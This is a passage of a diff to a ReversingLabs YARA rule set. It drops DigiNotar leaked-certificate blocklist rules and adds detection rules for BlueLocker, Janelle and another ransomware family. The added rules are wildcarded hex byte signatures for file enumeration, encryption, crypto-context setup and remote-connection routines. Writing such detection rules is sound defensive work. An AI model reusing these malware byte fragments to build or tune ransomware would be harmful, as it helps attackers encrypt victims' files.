+            ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? FF 75 ?? 68 ??
+            ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 55 ??
+            8B 45 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8A 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 84
+        }
+		$find_files_p2 = {
+            C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 12 E8 ?? ?? ?? ?? 8B 95
+            ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8A 55 ?? 8B 45 ?? E8 ??
+            ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? A1
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 6A ?? 68 ??
+            ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 50 ?? 8B 00 E8 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 3B 55 ?? 75 ?? 3B 45 ?? 0F 86 ?? ?? ?? ?? EB ?? 0F 8E ?? ?? ?? ?? 83 7D ?? ??
+            75 ?? 83 7D ?? ?? 0F 86 ?? ?? ?? ?? EB ?? 0F 8E ?? ?? ?? ?? 8B 45 ?? 83 38 ?? 73 ??
+            8B 45 ?? E8 ?? ?? ?? ?? 40 03 C0 50 E8 ?? ?? ?? ?? 59 89 45 ?? 83 7D ?? ?? 0F 84 ??
+            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 40 03 C0 50 8B 45 ?? E8 ??
+            ?? ?? ?? 8B D0 8B 45 ?? 59 E8 ?? ?? ?? ?? 8B 45 ?? 50 6A ?? 8D 45 ?? 50 B9 ?? ?? ??
+            ?? 33 D2 33 C0 E8 ?? ?? ?? ?? 8B D0 8B 45 ?? E8 ?? ?? ?? ?? EB ?? 8B 45 ?? E8 ?? ??
+            ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 40 03 C0 50 E8 ?? ?? ?? ?? 59 89 45 ?? 83 7D ?? ?? 74
+            ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 40 03 C0 50 8B 45 ?? E8 ?? ?? ??
+            ?? 8B D0 8B 45 ?? 59 E8 ?? ?? ?? ?? 8B 45 ?? 50 6A ?? 8D 45 ?? 50 B9 ?? ?? ?? ?? 33
+            D2 33 C0 E8 ?? ?? ?? ?? 8B D0 8B 45 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? EB ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 74 ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8A 45 ?? 50 8A 45 ?? 50 FF 75 ?? 68 ?? ??
+            ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B
+            55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 83 F8 ?? 1B C0
+            40 84 C0 0F 85 ?? ?? ?? ?? 83 FB ?? 74 ?? 53 E8 ?? ?? ?? ?? 4F
+        }
+		$enum_resources = {
+            55 8B EC 83 C4 ?? 53 56 57 8B F9 89 55 ?? 8B F0 8B 5D ?? C6 45 ?? ?? 33 C0 89 03 33
+            C0 89 07 8D 45 ?? 50 8B 45 ?? 50 6A ?? 56 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 89 03 83 3B ?? 74 ?? 83 3B ?? 74 ??
+            C7 07 ?? ?? ?? ?? 8B 03 33 C9 8B 55 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 8B 03 50 57 8B 45
+            ?? 50 E8 ?? ?? ?? ?? 8B F0 81 FE ?? ?? ?? ?? 75 ?? 8B C3 8B 55 ?? E8 ?? ?? ?? ?? EB
+            ?? BE ?? ?? ?? ?? EB ?? 81 FE ?? ?? ?? ?? 74 ?? 85 F6 0F 94 45 ?? 80 7D ?? ?? 75 ??
+            8B 03 E8 ?? ?? ?? ?? 33 C0 89 03 33 C0 89 07 8B 45 ?? 50 E8 ?? ?? ?? ?? 8A 45 ?? 5F
+            5E 5B 8B E5 5D C2
+        }
+		$remote_connection_p1 = {
+            BB ?? ?? ?? ?? 83 FB ?? 75 ?? 33 C0 89 45 ?? 83 FB ?? 75 ?? C7 45 ?? ?? ?? ?? ?? 8B
+            C6 E8 ?? ?? ?? ?? 8B C6 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 FF 33 C0 89 45 ?? 8D 45 ??
+            50 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 5A 2B C2 83 C0
+            ?? 50 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 83 C2 ?? 8B 45 ?? 59 E8 ?? ?? ??
+            ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 66 BA ??
+            ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 5A 2B C2 50 8D 85 ?? ?? ?? ?? 8B 55 ??
+            E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 66 BA ?? ?? E8 ?? ?? ?? ?? 8B D0 42 8B 45 ?? 59 E8
+            ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            66 BA ?? ?? E8 ?? ?? ?? ?? 8B C8 49 BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 85 FF 0F
+            85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 48 0F 8E ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 45
+            ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A
+            ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 89
+            45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ??
+            8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45 ?? 83 7D
+            ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 6A
+        }
+		$remote_connection_p2 = {
+            68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74
+            ?? 8B 06 E8 ?? ?? ?? ?? 99 52 50 8B 45 ?? 03 C7 33 D2 3B 54 24 ?? 75 ?? 3B 04 24 5A
+            58 76 ?? EB ?? 5A 58 7E ?? 8B 06 E8 ?? ?? ?? ?? 8B D0 81 C2 ?? ?? ?? ?? 8B C6 E8 ??
+            ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 03 C7 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 03 7D
+            ?? 81 FF ?? ?? ?? ?? 77 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ??
+            8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 6A
+            ?? 8B 45 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ??
+            6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ??
+            ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ??
+            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 89 45
+            ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ??
+            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B
+            45 ?? 50 E8 ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 74 ?? 8B 06 E8 ?? ?? ?? ?? 99 52 50
+            8B 45 ?? 03 C7 33 D2 3B 54 24 ?? 75 ?? 3B 04 24 5A 58 76 ?? EB ?? 5A 58 7E ?? 8B 06
+            E8 ?? ?? ?? ?? 8B D0 81 C2 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 03
+            C7 8D 95 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 03 7D ?? 81 FF ?? ?? ?? ?? 77 ?? 83 7D
+            ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 E8
+        }
+		$encrypt_files = {
+            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ??
+            E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75
+            ?? 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68
+            ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ??
+            ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ??
+            8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF
+            75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 55 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55
+            ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ??
+            ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D
+            ?? ?? 74
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar PKIoverheid CA Overheid en Bedrijven" and pe.signatures [ i ] . serial == "01:31:69:b0" and 1308182400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( all of ( $find_files_p* ) ) and ( $encrypt_files ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0C76Da9C910C4E2C9Efe15D058933C4C : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Bluelocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects BlueLocker ransomware."
 		author = "ReversingLabs"
-		id = "a9b06d49-1ab2-539e-bd1f-16da40b654b2"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "145ff05e-c90d-598a-a3d5-220bd6df718a"
+		date = "2022-08-04"
+		modified = "2022-08-04"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L873-L889"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.BlueLocker.yara#L1-L130"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "883e93bff42161ba68f69fb17f7e78377d7f3cb6b6cdf72cffb4166466f8bc7b"
+		logic_hash = "fbe5f246f4554e63b5da6a0aca169e8221a84fce18fd437ae7ad9b068e9ca576"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "BlueLocker"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Root CA" and pe.signatures [ i ] . serial == "0c:76:da:9c:91:0c:4e:2c:9e:fe:15:d0:58:93:3c:4c" and 1308182400 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_469C2Caf : INFO FILE
-{
-	meta:
-		description = "The digital certificate has leaked."
-		author = "ReversingLabs"
-		id = "12d7c4a8-0a84-502a-855b-674972a2e2e1"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L891-L907"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2490dbd74a5d3eede494d284f96af835c270d2fb0752b887aadbaf92bf34e6d4"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 8B 75 ?? 57
+            8B 7D ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 89 55 ?? 89 75 ??
+            89 45 ?? 89 7D ?? FF 15 ?? ?? ?? ?? 8B D8 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 53 FF 15
+            ?? ?? ?? ?? 8B 55 ?? 33 C9 0B C8 89 55 ?? 89 4D ?? 83 FB ?? 75 ?? 0B C3 5F 5E 5B 8B
+            4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 6A ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B
+            F0 FF 15 ?? ?? ?? ?? 33 C9 03 F0 83 C6 ?? 0F 92 C1 F7 D9 0B CE 51 E8 ?? ?? ?? ?? 8B
+            F0 83 C4 ?? 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 50 FF 75 ??
+            56 E8 ?? ?? ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 E8
+            ?? ?? ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 85 C9 0F 8C ?? ??
+            ?? ?? 8B 45 ?? 0F 8F ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 85 C9 0F 8F ?? ??
+            ?? ?? 7C ?? 3D ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 8B 55 ?? 8D
+            4D ?? D1 E8 89 45 ?? E8 ?? ?? ?? ?? 0F B6 4F ?? 0F 57 C0 0F B6 47 ?? C1 E1 ?? 0B C8
+        }
+		$encrypt_files_p2 = {
+            66 0F 13 45 ?? 0F B6 47 ?? C1 E1 ?? 0B C8 C7 45 ?? ?? ?? ?? ?? 0F B6 07 C1 E1 ?? 0B
+            C8 C7 45 ?? ?? ?? ?? ?? 0F B6 47 ?? 89 4D ?? 0F B6 4F ?? C1 E1 ?? 0B C8 0F B6 47 ??
+            6A ?? 6A ?? FF 75 ?? C1 E1 ?? FF 75 ?? 0B C8 0F B6 47 ?? 8B 3D ?? ?? ?? ?? C1 E1 ??
+            0B C8 53 89 4D ?? FF D7 33 F6 8D 45 ?? 56 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15
+            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 1F 40 ?? FF 75 ?? BA ?? ?? ?? ?? 8D 4D ?? E8
+            ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 33 C0 F7 D9 13 C0 6A ?? 6A ?? F7 D8 50 51 53 FF D7 6A
+            ?? 8D 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            8B 45 ?? 03 F0 3B 75 ?? 0F 87 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 6A ?? 8D
+            45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E9 ?? ?? ??
+            ?? 85 C9 7F ?? 7C ?? 3D ?? ?? ?? ?? 73 ?? 8B 75 ?? 8B CB 57 8B D6 E8 ?? ?? ?? ?? 8B
+            3D ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 75 ?? 8B CB 57 8B D6 E8 ?? ?? ?? ?? 8B 3D
+            ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 0F B6 4F ?? 0F
+        }
+		$encrypt_files_p3 = {
+            57 C0 0F B6 47 ?? C1 E1 ?? 0B C8 66 0F 13 45 ?? 0F B6 47 ?? C1 E1 ?? 0B C8 C7 45 ??
+            ?? ?? ?? ?? 0F B6 07 C1 E1 ?? 0B C8 C7 45 ?? ?? ?? ?? ?? 0F B6 47 ?? 89 4D ?? 0F B6
+            4F ?? C1 E1 ?? 0B C8 0F B6 47 ?? 6A ?? 6A ?? FF 75 ?? C1 E1 ?? FF 75 ?? 0B C8 0F B6
+            47 ?? 8B 3D ?? ?? ?? ?? C1 E1 ?? 0B C8 53 89 4D ?? FF D7 8B 35 ?? ?? ?? ?? 8D 45 ??
+            6A ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF D6 85 C0 74 ?? FF 75 ?? BA ?? ?? ?? ??
+            8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 33 C0 F7 D9 13 C0 6A ?? 6A ?? F7 D8 50 51
+            53 FF D7 6A ?? 8D 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ??
+            81 7D ?? ?? ?? ?? ?? 72 ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF D6
+            85 C0 75 ?? 8B 75 ?? 6A ?? 0F 57 C0 6A ?? 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 53 FF D7
+            6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 C7 45 ?? ?? ?? ?? ?? 83 C4 ?? 89 55 ?? C7
+            45 ?? ?? ?? ?? ?? 85 D2 74 ?? 8B FA B9 ?? ?? ?? ?? F3 A5 8B 4D ?? 68 ?? ?? ?? ?? 8B
+            01 8B 49 ?? 89 82 ?? ?? ?? ?? 8D 45 ?? 50 52 6A ?? 6A ?? 6A ?? FF 75 ?? 89 8A ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 8B 75 ?? 85 C0 74 ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 56 53 FF 15
+            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 EB ?? 83 CE ?? 85 DB 74 ?? 53 FF 15 ??
+            ?? ?? ?? 8B 7D ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? EB ?? 8B 7D ?? 57 E8 ?? ?? ?? ?? 8B
+            4D ?? 83 C4 ?? 8B C6 33 CD 5F 5E 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$find_files_p1 = {
+            FF 74 B4 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 46 83
+            FE ?? 7C ?? FF 74 24 ?? FF D7 68 ?? ?? ?? ?? 8B F0 FF D7 03 F0 8D 84 24 ?? ?? ?? ??
+            6A ?? 50 FF D7 8D 0C 06 33 C0 83 C1 ?? 0F 92 C0 F7 D8 0B C1 50 E8 ?? ?? ?? ?? 8B F0
+            83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? FF 74 24 ?? FF D7 48 50 FF 74 24 ?? 56 E8 ?? ?? ??
+            ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 56 E8 ?? ??
+            ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ??
+            83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 8B 7C 24 ?? 83 C4 ?? 83 C7 ?? 57 FF 15 ?? ?? ??
+            ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B C8 83 C4 ?? 85 C9 74 ?? 8B 54 24 ?? C7 01 ?? ?? ??
+            ?? C7 41 ?? ?? ?? ?? ?? 83 7A ?? ?? 75 ?? 89 4A ?? 89 4A ?? 57 89 31 FF 15 ?? ?? ??
+            ?? E9 ?? ?? ?? ?? 8B 42 ?? 89 48 ?? 8B 42 ?? 8B 40 ?? 89 42 ?? 89 30 57 FF 15 ?? ??
+            ?? ?? E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 33 F6 C7 44 24 ?? ?? ?? ?? ?? C7 44 24
+            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
+            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
+            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 74 B4 ?? 8D 84 24
+        }
+		$find_files_p2 = {
+            50 FF D3 85 C0 0F 85 ?? ?? ?? ?? 46 83 FE ?? 7C ?? 6A ?? FF 74 24 ?? FF D7 8B F0 8D
+            84 24 ?? ?? ?? ?? 50 FF D7 03 F0 33 C0 83 C6 ?? 0F 92 C0 F7 D8 0B C6 50 E8 ?? ?? ??
+            ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? FF 74 24 ?? FF D7 48 50 FF 74 24 ?? 56 E8
+            ?? ?? ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 56
+            E8 ?? ?? ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 56 E8 ?? ?? ?? ?? EB ?? 6A ?? 6A ?? E8 ?? ??
+            ?? ?? 8B D8 83 C4 ?? 85 DB 75 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 57 EB ?? 57 68 ?? ?? ??
+            ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53 6A ?? FF 74 24 ?? FF 15 ?? ?? ?? ??
+            85 C0 74 ?? 8B 54 24 ?? 53 57 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 83 C4 ??
+            57 E8 ?? ?? ?? ?? 83 C4 ?? 53 E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 8B 35 ?? ??
+            ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 74 24 ?? FF 15
+        }
+		$create_crypt_context = {
+            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ??
+            ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 C8 ?? 8B 4D ?? 33 CD E8 ?? ?? ??
+            ?? 8B E5 5D C2 ?? ?? 56 8B 35 ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
+            ?? 6A ?? 50 FF D6 85 C0 75 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 8D 45 ?? 50 FF
+            D6 85 C0 75 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 8D 45 ?? 50 FF D6 85 C0 75 ??
+            68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 8D 45 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 6A
+            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? 68 ?? ?? ?? ?? 56 6A ??
+            FF 15 ?? ?? ?? ?? 8D 45 ?? 89 35 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
+            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D
+            04 45 ?? ?? ?? ?? 50 FF 35 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ??
+            ?? ?? ?? 85 C0 75 ?? 50 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ??
+            ?? ?? ?? 8B 45 ?? 5E 85 C0 74 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ??
+            33 C0 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DigiNotar Root CA" and pe.signatures [ i ] . serial == "46:9c:2c:af" and 1308182400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $create_crypt_context ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_469C3Cc9 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Janelle : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects Janelle ransomware."
 		author = "ReversingLabs"
-		id = "36d76a9f-d18f-56bf-b00a-f7320f04f39a"
-		date = "2020-08-05"
-		modified = "2023-11-08"
